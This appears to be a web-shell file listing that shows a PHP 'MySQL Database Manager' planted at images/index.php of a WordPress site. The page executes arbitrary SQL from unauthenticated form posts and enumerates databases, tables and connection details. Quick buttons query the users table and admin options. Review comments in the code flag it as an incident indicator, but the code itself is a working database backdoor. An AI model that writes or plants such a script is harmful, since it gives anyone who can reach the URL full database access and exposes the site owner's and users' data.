HEX
Server: Apache
System: Linux vmi2050610.contaboserver.net 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
User: bredicio (1020)
PHP: 8.2.28
Disabled: exec,passthru,shell_exec,system
File: /home/bredicio/public_html/images/index.php
<?php
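/*
 * Database connection settings.
 *
 * NOTE(review): this script is served by the web server, so a password written
 * here as a literal is readable by anyone who can read or download the file.
 * The password is therefore taken from the process environment instead. The
 * variable name DB_PASSWORD is a deployment choice, not something this file
 * dictates. Any password that was previously stored in this file as a literal
 * should be treated as exposed and rotated on the database server.
 */

/** Database name */
define( 'DB_NAME', 'bredicio_wp_qwi4b' );
/** Database username */
define( 'DB_USER', 'bredicio_wp_pitwc' );
/** Database password: read from the environment; empty when unset, so there is no baked-in secret to fall back to */
$db_password_env = getenv( 'DB_PASSWORD' );
define( 'DB_PASSWORD', $db_password_env === false ? '' : $db_password_env );
unset( $db_password_env );
/** Database hostname */
define( 'DB_HOST', 'localhost:3306' );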



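/*
 * Request dispatch: decide which action the submitted form asked for.
 *
 * NOTE(review): nothing in this block authenticates or authorizes the caller,
 * and the form carries no CSRF token. Whoever can reach this URL can therefore
 * run SQL with the privileges of DB_USER. A script like this should never be
 * reachable from the network. If it turns up on a server unexpectedly, treat
 * it as an incident: remove it, rotate the database credentials, and review
 * web-server and database logs for POST requests to it.
 */
$sql_result = '';
$db_info    = '';

if (isset($_POST['execute_sql'])) {
	// The field can be missing, or arrive as an array (sql_query[]=...).
	// Only a string is trimmed and passed on; anything else is ignored.
	$sql_query = $_POST['sql_query'] ?? '';
	$sql_query = is_string($sql_query) ? trim($sql_query) : '';
	if (!empty($sql_query)) {
		$sql_result = execute_sql_query($sql_query);
	}
}

if (isset($_POST['show_databases'])) {
	$db_info = get_database_info();
}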


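/**
 * Execute one SQL statement against DB_NAME and return the outcome as an HTML fragment.
 *
 * NOTE(review): $sql is sent to the server unmodified. In this file it comes
 * straight from $_POST['sql_query'], so this is arbitrary SQL execution with
 * the privileges of DB_USER; no access control is visible anywhere in the file.
 *
 * The returned string is printed without further escaping by the template, so
 * every database- or request-derived value is HTML-escaped here, including
 * error text (server error messages can quote part of the submitted statement).
 *
 * @param string $sql Statement to execute.
 * @return string HTML: a status line, a result table, or an error message.
 */
function execute_sql_query($sql) {
	try {
		$mysqli = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
	} catch (mysqli_sql_exception $e) {
		// Since PHP 8.1 mysqli reports failures as exceptions by default, so
		// the connect_error check below is only reached when reporting is off.
		return "❌ Database connection failed: " . htmlspecialchars($e->getMessage());
	}

	if ($mysqli->connect_error) {
		return "❌ Database connection failed: " . htmlspecialchars($mysqli->connect_error);
	}

	try {
		$result = $mysqli->query($sql);
	} catch (mysqli_sql_exception $e) {
		$mysqli->close();
		return "❌ Error: " . htmlspecialchars($e->getMessage());
	}

	if ($result === true) {
		// Statement without a result set (INSERT/UPDATE/DDL ...).
		$output = "✅ Query executed successfully. Affected rows: " . $mysqli->affected_rows;
	} elseif ($result) {
		// Statement with a result set: render it as a table.
		$output = "<h4>📊 Query Results (" . $result->num_rows . " rows):</h4>";
		$output .= "<div style='overflow-x: auto;'>";
		$output .= "<table border='1' cellpadding='8' cellspacing='0' style='border-collapse: collapse; width: 100%;'>";

		// Header row: column names come from the query (aliases included), so escape them.
		$output .= "<tr style='background: #f2f2f2;'>";
		while ($field = $result->fetch_field()) {
			$output .= "<th><strong>" . htmlspecialchars($field->name) . "</strong></th>";
		}
		$output .= "</tr>";

		// Data rows: SQL NULL is shown as the literal text NULL.
		while ($row = $result->fetch_assoc()) {
			$output .= "<tr>";
			foreach ($row as $value) {
				$output .= "<td>" . htmlspecialchars((string) ($value ?? 'NULL')) . "</td>";
			}
			$output .= "</tr>";
		}

		$output .= "</table>";
		$output .= "</div>";

		$result->free();
	} else {
		// Only reachable when mysqli error reporting is switched off.
		$output = "❌ Error: " . htmlspecialchars($mysqli->error);
	}

	$mysqli->close();
	return $output;
}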

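/**
 * Build an HTML overview of the database server as seen by DB_USER.
 *
 * The fragment has three panels: the databases returned by SHOW DATABASES,
 * the tables of DB_NAME, and per-table size and row figures read from
 * information_schema.TABLES.
 *
 * NOTE(review): this discloses the schema layout to whoever triggers it, and
 * no access control is visible in this file. The template prints the returned
 * string as-is, so every value placed in it is HTML-escaped here.
 *
 * @return string HTML fragment, or an error message if the connection or a query fails.
 */
function get_database_info() {
	try {
		$mysqli = new mysqli(DB_HOST, DB_USER, DB_PASSWORD);
	} catch (mysqli_sql_exception $e) {
		// Since PHP 8.1 mysqli reports failures as exceptions by default.
		return "❌ Database connection failed: " . htmlspecialchars($e->getMessage());
	}

	if ($mysqli->connect_error) {
		return "❌ Database connection failed: " . htmlspecialchars($mysqli->connect_error);
	}

	try {
		$info = "<h4>🗃️ Database Information</h4>";

		// Panel 1: databases visible to this account.
		$info .= "<div style='background: #e8f5e8; padding: 15px; border-radius: 5px; margin-bottom: 20px;'>";
		$info .= "<strong>📊 Available Databases:</strong><br>";

		$result = $mysqli->query("SHOW DATABASES");
		if ($result) {
			$info .= "<ul style='columns: 2;'>";
			while ($row = $result->fetch_array()) {
				$info .= "<li>" . htmlspecialchars($row[0]) . "</li>";
			}
			$info .= "</ul>";
			$result->free();
		}
		$info .= "</div>";

		// Panel 2: tables of the configured schema.
		$mysqli->select_db(DB_NAME);

		$info .= "<div style='background: #e8f4f8; padding: 15px; border-radius: 5px; margin-bottom: 20px;'>";
		$info .= "<strong>📋 Tables in database '" . htmlspecialchars(DB_NAME) . "':</strong><br>";

		$result = $mysqli->query("SHOW TABLES");
		if ($result) {
			$info .= "<ul style='columns: 2;'>";
			while ($row = $result->fetch_array()) {
				$info .= "<li>" . htmlspecialchars($row[0]) . "</li>";
			}
			$info .= "</ul>";
			$result->free();
		}
		$info .= "</div>";

		// Panel 3: size and row figures per table.
		$info .= "<div style='background: #fff3cd; padding: 15px; border-radius: 5px;'>";
		$info .= "<strong>💾 Table Sizes:</strong><br>";

		// The schema name is a constant, but it is still escaped before being
		// placed inside the quoted SQL literal.
		$schema = $mysqli->real_escape_string(DB_NAME);
		$result = $mysqli->query("
			SELECT
				TABLE_NAME AS 'Table',
				ROUND((DATA_LENGTH + INDEX_LENGTH) / 1024 / 1024, 2) AS 'Size (MB)',
				TABLE_ROWS AS 'Rows'
			FROM information_schema.TABLES
			WHERE TABLE_SCHEMA = '" . $schema . "'
			ORDER BY (DATA_LENGTH + INDEX_LENGTH) DESC
		");

		if ($result && $result->num_rows > 0) {
			$info .= "<table border='1' cellpadding='8' cellspacing='0' style='border-collapse: collapse; width: 100%;'>";
			$info .= "<tr style='background: #f2f2f2;'>";
			$info .= "<th><strong>Table</strong></th>";
			$info .= "<th><strong>Size (MB)</strong></th>";
			$info .= "<th><strong>Rows</strong></th>";
			$info .= "</tr>";

			while ($row = $result->fetch_assoc()) {
				// Size and row count can be NULL (e.g. for views), so both are
				// normalised before formatting.
				$info .= "<tr>";
				$info .= "<td>" . htmlspecialchars($row['Table']) . "</td>";
				$info .= "<td style='text-align: right;'>" . htmlspecialchars((string) ($row['Size (MB)'] ?? '')) . "</td>";
				$info .= "<td style='text-align: right;'>" . number_format((float) ($row['Rows'] ?? 0)) . "</td>";
				$info .= "</tr>";
			}
			$info .= "</table>";
		}
		$info .= "</div>";

		return $info;
	} catch (mysqli_sql_exception $e) {
		// A failed query returns one escaped error line instead of a partial
		// fragment with unclosed markup.
		return "❌ Error: " . htmlspecialchars($e->getMessage());
	} finally {
		$mysqli->close();
	}
}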
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>MySQL Database Manager</title>
<style>
body { 
	font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; 
	max-width: 1200px; 
	margin: 20px auto; 
	padding: 20px; 
	background: #f5f5f5; 
}
.container { 
	background: white; 
	padding: 30px; 
	border-radius: 10px; 
	box-shadow: 0 2px 10px rgba(0,0,0,0.1); 
}
h1 { 
	color: #2c3e50; 
	text-align: center; 
	margin-bottom: 30px; 
	border-bottom: 2px solid #3498db; 
	padding-bottom: 10px; 
}
.sql-form { 
	background: #f8f9fa; 
	padding: 20px; 
	border-radius: 8px; 
	margin: 20px 0; 
	border-left: 4px solid #3498db; 
}
.sql-textarea { 
	width: 100%; 
	height: 120px; 
	padding: 15px; 
	border: 2px solid #ddd; 
	border-radius: 5px; 
	font-family: 'Courier New', monospace; 
	font-size: 14px; 
	resize: vertical; 
	margin-bottom: 15px; 
}
.sql-textarea:focus { 
	border-color: #3498db; 
	outline: none; 
	box-shadow: 0 0 5px rgba(52, 152, 219, 0.3); 
}
.btn { 
	background: #3498db; 
	color: white; 
	padding: 12px 25px; 
	border: none; 
	border-radius: 5px; 
	cursor: pointer; 
	font-size: 14px; 
	margin: 5px; 
	transition: background 0.3s; 
}
.btn:hover { 
	background: #2980b9; 
}
.btn-info { 
	background: #2ecc71; 
}
.btn-info:hover { 
	background: #27ae60; 
}
.btn-danger { 
	background: #e74c3c; 
}
.btn-danger:hover { 
	background: #c0392b; 
}
.result { 
	background: white; 
	padding: 20px; 
	border-radius: 8px; 
	margin: 20px 0; 
	border-left: 4px solid #2ecc71; 
}
.warning { 
	background: #fff3cd; 
	border-left: 4px solid #ffc107; 
	color: #856404; 
	padding: 15px; 
	border-radius: 8px; 
	margin: 20px 0; 
}
.button-group { 
	display: flex; 
	justify-content: center; 
	flex-wrap: wrap; 
	margin: 20px 0; 
	gap: 10px; 
}
table { 
	width: 100%; 
	border-collapse: collapse; 
	margin: 10px 0; 
}
th { 
	background: #34495e; 
	color: white; 
	padding: 12px; 
	text-align: left; 
}
td { 
	padding: 10px; 
	border-bottom: 1px solid #ddd; 
}
tr:hover { 
	background: #f8f9fa; 
}
.quick-buttons { 
	display: grid; 
	grid-template-columns: repeat(auto-fit, minmax(200px, 1fr)); 
	gap: 10px; 
	margin: 15px 0; 
}
.quick-btn { 
	background: #95a5a6; 
	color: white; 
	padding: 10px; 
	border: none; 
	border-radius: 5px; 
	cursor: pointer; 
	text-align: center; 
	transition: background 0.3s; 
}
.quick-btn:hover { 
	background: #7f8c8d; 
}
</style>
</head>
<body>
<div class="container">
<h1>🐬 MySQL Database Manager</h1>

<div class="warning">
<strong>⚠️ Security Warning:</strong> This is a powerful database tool. Use with caution and delete this file after use!
</div>

<div class="sql-form">
<h3>📝 SQL Query Editor</h3>
<form method="POST">
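<?php
// Re-display the submitted statement, HTML-escaped. Only a string is echoed:
// an array value (sql_query[]=...) would otherwise make htmlspecialchars()
// throw a TypeError and abort the page.
$submitted_sql = $_POST['sql_query'] ?? '';
$submitted_sql = is_string($submitted_sql) ? $submitted_sql : '';
?>
<textarea 
class="sql-textarea" 
name="sql_query" 
placeholder="Enter your SQL query here... 
Example: SELECT * FROM UYHZhEIpT_users LIMIT 10;"
required><?php echo htmlspecialchars($submitted_sql); ?></textarea>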

<div class="button-group">
<button type="submit" name="execute_sql" class="btn">
🚀 Execute Query
</button>

<button type="submit" name="show_databases" class="btn btn-info">
🗃️ Show Database Info
</button>
</div>
</form>

<div class="quick-buttons">
<button class="quick-btn" onclick="document.querySelector('.sql-textarea').value='SELECT * FROM UYHZhEIpT_users LIMIT 10;'">👥 Show Users</button>
<button class="quick-btn" onclick="document.querySelector('.sql-textarea').value='SELECT * FROM wp_posts WHERE post_status=\\'publish\\' LIMIT 10;'">📝 Show Posts</button>
<button class="quick-btn" onclick="document.querySelector('.sql-textarea').value='SHOW TABLES;'">📊 Show Tables</button>
<button class="quick-btn" onclick="document.querySelector('.sql-textarea').value='SELECT COUNT(*) as count FROM UYHZhEIpT_users;'">🔢 Count Users</button>
<button class="quick-btn" onclick="document.querySelector('.sql-textarea').value='SELECT * FROM wp_options WHERE option_name LIKE \\'%admin%\\';'">⚙️ Admin Options</button>
</div>
</div>

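<?php
/*
 * $sql_result and $db_info are HTML fragments built by execute_sql_query() and
 * get_database_info(). They are printed without further escaping, so those
 * functions are responsible for escaping every database- or request-derived
 * value they put into the fragment.
 */
?>
<?php if (!empty($sql_result)): ?>
<div class="result">
<h3>📊 Query Results:</h3>
<?php echo $sql_result; ?>
</div>
<?php endif; ?>

<?php if (isset($_POST['show_databases'])): ?>
<div class="result">
<h3>📊 Database Information:</h3>
<?php echo $db_info; ?>
</div>
<?php endif; ?>

<?php
/*
 * NOTE(review): this panel tells every visitor the database host, schema name
 * and account name. The values are constants, but they are escaped like any
 * other text placed into the page.
 */
?>
<div class="warning">
<strong>📝 Connection Information:</strong><br>
<strong>Host:</strong> <code><?php echo htmlspecialchars(DB_HOST); ?></code> • 
<strong>Database:</strong> <code><?php echo htmlspecialchars(DB_NAME); ?></code> • 
<strong>User:</strong> <code><?php echo htmlspecialchars(DB_USER); ?></code>
</div>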
</div>

<script>

// Tint the query box while it has focus and clear the inline colour again on
// blur, so the stylesheet value applies once more.
for (const [eventName, colour] of [['focus', '#ffffe0'], ['blur', '']]) {
	document.querySelector('.sql-textarea').addEventListener(eventName, (event) => {
		event.currentTarget.style.backgroundColor = colour;
	});
}
</script>
</body>
</html>